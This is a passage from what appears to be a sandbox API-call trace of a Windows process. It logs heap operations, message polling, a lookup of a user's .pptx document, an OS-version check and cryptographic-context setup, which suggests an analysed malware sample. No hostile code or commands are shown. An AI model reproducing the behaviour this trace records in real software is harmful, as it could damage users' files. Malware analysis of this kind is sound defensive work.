hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0266.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.412] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0266.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0266.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0266.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0266.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0266.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.413] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0266.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0266.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0266.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0266.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0266.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0266.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.414] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/ZeVUVJRj4YhmoN71.pptx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc815a370, ftCreationTime.dwHighDateTime=0x1d4d4fe, ftLastAccessTime.dwLowDateTime=0x30e7af10, ftLastAccessTime.dwHighDateTime=0x1d4b63c, ftLastWriteTime.dwLowDateTime=0x30e7af10, ftLastWriteTime.dwHighDateTime=0x1d4b63c, nFileSizeHigh=0x0, nFileSizeLow=0x174d9, dwReserved0=0x9d10047, dwReserved1=0x29c8e, cFileName="ZeVUVJRj4YhmoN71.pptx", cAlternateFileName="ZEVUVJ~1.PPT")) returned 0xaa59a0 [0266.414] FindClose (in: hFindFile=0xaa59a0 | out: hFindFile=0xaa59a0) returned 1 [0266.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.415] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0266.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0266.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0266.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0266.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0266.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0266.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.417] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.417] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0266.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.417] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.417] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0266.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.418] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0266.418] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.418] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.418] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.418] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0266.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.419] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0266.419] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0266.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.420] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.420] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0266.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0266.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.421] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.421] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.421] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0266.421] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.421] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0266.421] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.421] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.421] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.421] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.422] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.422] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.422] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0266.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0266.422] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.422] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.422] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0266.422] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.422] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0266.422] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0266.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0266.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.423] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0266.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0266.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0266.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0266.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0266.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0266.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 